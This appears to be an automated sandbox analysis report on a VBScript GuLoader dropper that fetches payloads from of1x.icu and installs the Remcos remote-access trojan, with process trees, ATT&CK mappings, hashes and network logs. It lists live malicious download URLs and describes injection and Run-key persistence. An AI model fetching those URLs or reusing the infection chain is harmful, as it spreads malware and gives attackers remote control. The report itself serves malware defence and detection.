              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F31A9 FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,GetLengthSid,memset,GlobalAlloc,InitializeAcl,AddAccessAllowedAce,GetAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetSecurityDescriptorLength,MakeSelfRelativeSD,GetLastError,GlobalFree,GetLastError,FreeSid
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F30F2 AllocateAndInitializeSid,GetLastError,GetLengthSid,FreeSid,GetLengthSid,memcpy,FreeSid
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F5C84 memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F9E35 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 9_2_001F63E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-6US4Y7
              Source: Yara match | File source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              1
              DLL Side-Loading
              2
              Obfuscated Files or Information
              OS Credential Dumping1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts3
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              1
              Software Packing
              LSASS Memory1
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              3
              Windows Service
              3
              Windows Service
              1
              DLL Side-Loading
              Security Account Manager25
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Command and Scripting Interpreter
              11
              Registry Run Keys / Startup Folder
              311
              Process Injection
              1
              Masquerading
              NTDS21
              Security Software Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              Service Execution
              Network Logon Script11
              Registry Run Keys / Startup Folder
              31
              Virtualization/Sandbox Evasion
              LSA Secrets1
              Process Discovery
              SSHKeylogging13
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable Media2
              PowerShell
              RC ScriptsRC Scripts1
              Access Token Manipulation
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Process Injection
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph ID: 1579623 | Sample: Rokadernes.vbs | Startdate: 23/12/2024 | Architecture: WINDOWS | Score: 100
              Signatures on the sample: Malicious sample detected (through community Yara rule); Yara detected GuLoader; Yara detected Powershell download and execute; 5 other signatures
              DNS/IP: of1x.icu, 104.21.86.72, port 443 (client ports 49730, 49737), CLOUDFLARENET US, United States; contacted by the powershell.exe child of wscript.exe
              Process tree:
                wscript.exe (VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures)
                  -> powershell.exe (Found suspicious powershell code related to unpacking or dynamic code loading)
                       -> conhost.exe
                powershell.exe (Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection))
                  -> msiexec.exe (dropped C:\ProgramData\Remcos\remcos.exe, PE32; Detected Remcos RAT; Creates autostart registry keys with suspicious names)
                       -> remcos.exe
                  -> conhost.exe
                remcos.exe
                remcos.exe

Source                            Detection  Scanner        Label
Rokadernes.vbs                    0%         ReversingLabs
Rokadernes.vbs                    5%         Virustotal

Source                            Detection  Scanner        Label
C:\ProgramData\Remcos\remcos.exe  0%         ReversingLabs
              No Antivirus matches
Name      IP            Active  Malicious  Antivirus Detection  Reputation
of1x.icu  104.21.86.72  true    false                           high
Name                                     Malicious  Antivirus Detection  Reputation
https://of1x.icu/CACZkcPf/Schmeer.aca    false                           unknown
https://of1x.icu/rTPVLEPs/asyclWl80.bin  false                           unknown
IP            Domain    Country        Flag  ASN    ASN Name         Malicious
104.21.86.72  of1x.icu  United States        13335  CLOUDFLARENETUS  false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579623
Start date and time: 2024-12-23 06:40:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Rokadernes.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@12/8@1/1
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 75
• Number of non-executed functions: 48
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 6804 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2504 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 764 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
00:41:02  API Interceptor  83x Sleep call for process: powershell.exe modified
05:41:48  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7 "C:\ProgramData\Remcos\remcos.exe"
05:41:56  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-6US4Y7 "C:\ProgramData\Remcos\remcos.exe"
Match: 104.21.86.72
Associated Sample Name / URL  Detection  Threat Name       Context
Sentinelled.vbs               malicious  Unknown
Brooming.vbs                  malicious  Remcos, GuLoader
Reqt 83291.vbs                malicious  Remcos, GuLoader
Match: of1x.icu
Associated Sample Name / URL  Detection  Threat Name       Context
Sentinelled.vbs               malicious  Unknown           104.21.86.72
Brooming.vbs                  malicious  Remcos, GuLoader  104.21.86.72
Strait STS.vbs                malicious  Remcos, GuLoader  172.67.216.143
Reqt 83291.vbs                malicious  Remcos, GuLoader  104.21.86.72
Match: CLOUDFLARENETUS
Associated Sample Name / URL  Detection  Threat Name     Context
uZO96rXyWt.exe                malicious  LummaC          104.21.66.86
trZG6pItZj.exe                malicious  Vidar           172.64.41.3
fKdiT1D1dk.exe                malicious  RHADAMANTHYS    104.16.249.249
fKdiT1D1dk.exe                malicious  RHADAMANTHYS    104.16.248.249
https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLw  malicious  Unknown  162.247.243.29
http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72  malicious  Unknown  172.67.191.167
Echelon.exe                   malicious  LummaC Stealer  172.67.154.166
Neverlose.cc.exe              malicious  LummaC          172.67.157.254
setup.msi                     malicious  Unknown         104.21.65.145
bas.exe                       malicious  LummaC          104.21.71.155
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL      Detection  Threat Name         Context
tg.exe                            malicious  Babadeda            104.21.86.72
tg.exe                            malicious  Babadeda            104.21.86.72
setup.exe                         malicious  Babadeda            104.21.86.72
Loader.exe                        malicious  RHADAMANTHYS        104.21.86.72
medicalanalysispro.exe            malicious  RHADAMANTHYS        104.21.86.72
winwidgetshp.mp4.hta              malicious  LummaC              104.21.86.72
Support.Client.exe                malicious  ScreenConnect Tool  104.21.86.72
NOTIFICATION_OF_DEPENDANTS_1.vbs  malicious  Unknown             104.21.86.72
NOTIFICATION_OF_DEPENDANTS.vbs    malicious  Unknown             104.21.86.72
HLMJbase.dll                      malicious  Unknown             104.21.86.72

Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL      Detection  Threat Name                                                        Context
trZG6pItZj.exe                    malicious  Vidar                                                              104.21.86.72
9EI7wrGs4K.exe                    malicious  Vidar                                                              104.21.86.72
setup.msi                         malicious  Unknown                                                            104.21.86.72
Setup.exe                         malicious  Unknown                                                            104.21.86.72
Setup.exe                         malicious  Unknown                                                            104.21.86.72
AmsterdamCryptoLTD.exe            malicious  LummaC, DarkComet, LummaC Stealer, Vidar                           104.21.86.72
installer.msi                     malicious  Unknown                                                            104.21.86.72
GoldenContinent.exe               malicious  Vidar                                                              104.21.86.72
file.exe                          malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc         104.21.86.72
file.exe                          malicious  LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar  104.21.86.72
Match: C:\ProgramData\Remcos\remcos.exe
Associated Sample Name / URL                                                   Detection  Threat Name
Brooming.vbs                                                                   malicious  Remcos, GuLoader
PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs                         malicious  GuLoader, Lokibot
SOLICITUD DE PEDIDO (Universidade de São Paulo (USP))09-30-2024·pdf.vbs        malicious  GuLoader, Lokibot
Bnnebgers.vbs                                                                  malicious  GuLoader, Lokibot
C7jdH7geD6.exe                                                                 malicious  Unknown
setup.exe                                                                      malicious  Unknown
查询入口.exe                                                                    malicious  Unknown
sample.exe                                                                     malicious  Unknown
                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):59904
                                                                                                                            Entropy (8bit):5.770776695007155
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                                                                                                            MD5:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                            SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                                                                                                            SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                                                                                                            SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
• Filename: Brooming.vbs, Detection: malicious
• Filename: PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs, Detection: malicious
• Filename: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs, Detection: malicious
• Filename: Bnnebgers.vbs, Detection: malicious
• Filename: C7jdH7geD6.exe, Detection: malicious
• Filename: setup.exe, Detection: malicious
• Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious
• Filename: sample.exe, Detection: malicious
                                                                                                                            Reputation:low
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...tkq.tkq.tkq.`.r.skq.`.t.zkq.`.p.ykq.tkp..kq.`.x.wkq.`.u.=kq.`...ukq.`.s.ukq.Richtkq.........PE..L....E.%.....................^......0.............@.......................... ......\.....@...... ...................................................................(..T...............................@.......................@....................text...d........................... ..`.data...............................@....idata..............................@..@.didat..L...........................@....rsrc............ ..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):8003
                                                                                                                            Entropy (8bit):4.840877972214509
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                                            MD5:106D01F562D751E62B702803895E93E0
                                                                                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                                            Malicious:false
                                                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                                                                            MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                                                                            SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                                                                            SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                                                                            SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e................................. ..............@..........
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):441512
                                                                                                                            Entropy (8bit):5.974857041853696
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:bS4XrsPEASuibD0fdBnf9qojXLgNpjRxWh8eOi5n0hjKnLtassYM+wHxO3G9PLVD:bzu6ed1VnUNRDMOi5nqItZsYMNHxQGFp
                                                                                                                            MD5:E03D2D397ED28D6B14BEF58A8D4D458D
                                                                                                                            SHA1:7D4576F4E95FCE89C46F8938E4878E4978451064
                                                                                                                            SHA-256:3431EFE72E7264A06276D165454755C1A1F98B0F57132C43F8369DB6B3C6324A
                                                                                                                            SHA-512:FF97033C57032E8F65334183D70C44F3D4B95151E27605AAB48A68CD5DD53278AE43F8004F96D38F218C3A8D320EBF329C342199F8987691240F45855AD8ED34
                                                                                                                            Malicious:false
                                                                                                                            File type:ASCII text, with very long lines (349), with CRLF, CR line terminators
                                                                                                                            Entropy (8bit):4.966028065574932
                                                                                                                            TrID:
                                                                                                                              File name:Rokadernes.vbs
                                                                                                                              File size:73'628 bytes
                                                                                                                              MD5:693321a98dce16a4369d750bac3c4fb0
                                                                                                                              SHA1:cadf2497394e79cfd3c02a4f5bbb1adb6503d29c
                                                                                                                              SHA256:d719392462e09d59474cafa8d7b107d4e3063a664a51e87c5e2b750cf100be69
                                                                                                                              SHA512:8e97a99d8c64243fb6a348703d5bde412e599064162fc44be9f07cc28c78fff28720cce03df253c8537dd370abbaad0748fa02f2b828a64b54c6504d4eeaf1c5
                                                                                                                              SSDEEP:1536:mYzMve/RmHTWUZnz7FcfIJVd00cYiEzYfOEt2b4:mYiepmzWqz5tJ300bz9Et2b4
                                                                                                                              TLSH:BB734B62EF28166B0E5B279AFD581E43C57CC615452728E1BEE9070D600A8ECE3FE71D
                                                                                                                              File Content Preview:....Bestanddelsknoglemarvspr = RTrim("Courages")....'Taffle flaskehalses, uppowoc..'Asteer disengagere,..'Manducable: viljestyrkerne! dslere mandelgavens bogsamlingers..'Creophagous? handelsrejser, externate111! paedometrical? impostrous!..'Profilernes, i
                                                                                                                              Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T06:41:44.226095+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49737 | 104.21.86.72 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 06:41:04.572505951 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:04.572536945 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:04.572616100 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:04.581509113 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:04.581537008 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:05.805879116 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:05.806015968 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:05.847883940 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:05.847950935 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:05.848921061 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:05.895420074 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:05.946475029 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:05.987377882 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.432308912 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.432440042 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.432487965 CET | 49730 | 443 | 192.168.2.4 | 104.21.86.72
Dec 23, 2024 06:41:06.432512999 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
Dec 23, 2024 06:41:06.432600975 CET | 443 | 49730 | 104.21.86.72 | 192.168.2.4
